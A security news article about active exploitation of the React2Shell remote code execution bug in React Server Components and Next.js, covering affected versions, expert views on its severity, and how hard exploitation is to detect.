Exploitation of CVE-2025-55182, dubbed React2Shell, is escalating in the wild, say security researchers. Amazon said it had seen a trio of China-linked threat groups exploiting the pre-auth RCE bug – whilst Cloudflare inadvertently  took down its own services scrambling an Internet-scale fix. 

The CVSS 10 vulnerability affects React and Next.js. Public disclosure came on December 3. Exploitation of the React bug followed within 30 hours. 

Threat actors managed to replicate a variant of New Zealand-based researcher Lachlan Davidson (who disclosed the bug)’s elegantly simple code and attacks are now happening at some scale – with the caveat that exploitability is limited to newer stacks; CVE-2025-55182 affects React 19+ and Next.js versions 15.x and 16.x when using its App Router functions.

(There’s even a publicly available Chrome extension on GitHub that automatically scans for and exploits vulnerable sites as attackers browse.)

Vercel CEO Guillermo Rauch has a useful walkthrough of the “doozy” of a bug here, describing it as “A juxtaposition of a glaring omission of a safety check, combined with a stunningly brilliant mechanism to exploit it.”

Overreaction to a “celebrity vulnerability”?

To security researcher Kevin Beaumont, a furore around the bug is “overreaction”: React 19 was only released in December 2024 and exploitability relies on the use of React Server Components; also new.

“This is a niche setup,” he wrote this weekend.

Beaumont added: “A vast majority of organisations won’t have this setup yet, let alone internet facing. The vulnerability was caught quickly after it was first introduced in the new feature by the maintainers…”

Nextron Systems’ Florian Roth notes that, despite this and some other configuration caveats, the attack surface is not insignificant: “In Next.js with the App Router, Server Components are the default. Pages and layouts are server components unless you explicitly mark them with ‘use client’. 

“React 19 alone doesn’t enable this by itself, but once a framework like Next.js implements RSC, you are effectively in that model by default…”

Sysdig notes that other frameworks are vulnerable, including:

  • Next.js (15.0.4 through 16.0.6, plus canaries from 14.3.0-canary.77)
  • React Router (RSC mode)
  • Waku
  • Parcel RSC (@parcel/rsc)
  • Vite RSC (@vitejs/plugin-rsc)
  • RedwoodSDK (rwsdk)

Security researcher search engine ZoomEye suggests that over 672,000+ exposed assets have already potentially been exploited – with React2Shell progressively being added to Mirai and other botnet exploitation kits.

(On the server, Next.js uses React's APIs to orchestrate rendering. The rendering work is split into chunks… Server Components are rendered into a data format called the React Server Component Payload or “RSC’, and Client Components and the RSC Payload are used to pre-render HTML.)

React2Shell: Leave no trace

A key challenge for defenders, as ever, is identifying their attack surface (Assetnote has provided a free scanner that the original finder of the vulnerability, Lachlan Davidson, himself describes as “very effective at detecting unpatched Next.js instances that use Server Components”).

Identifying exploitation is notably challenging too. As Roth noted on X: “It’s wild how little sticks around when someone hits a server with the React RCE payload. All the interesting parts of the POST request live for a moment in memory, get decoded, executed (or rejected), and vanish. Nothing hits a log, nothing lands on disk. You can scan process memory for patterns, sure, but you’ll mostly catch scanners, broken requests, bots, random noise. 

He added: “A clean ‘this was a successful exploit’ signal isn’t really possible here. The only reliable detection is post-exploitation activity on the box.”

His colleague Swachchhanda Poudel over the weekend developed some Sigma rules "that cover the one thing that reliably shows up when someone actually executes code on a Node.js server -> child processes. One rule for Linux, one for Windows. It’s not a silver bullet," wrote Roth, "just one of the few angles that makes sense right now. We pushed all our YARA and Sigma signatures for the React RCE cases as well, and contributed the Sigma rules upstream: https://github.com/SigmaHQ/sigma/pull/5795

"This whole situation shows how much attack surface lives in places many of us didn’t think about before. I expect we’ll see more of this class of issues now that people realize what’s possible."

Join peers following The Stack on LinkedIn

The link has been copied!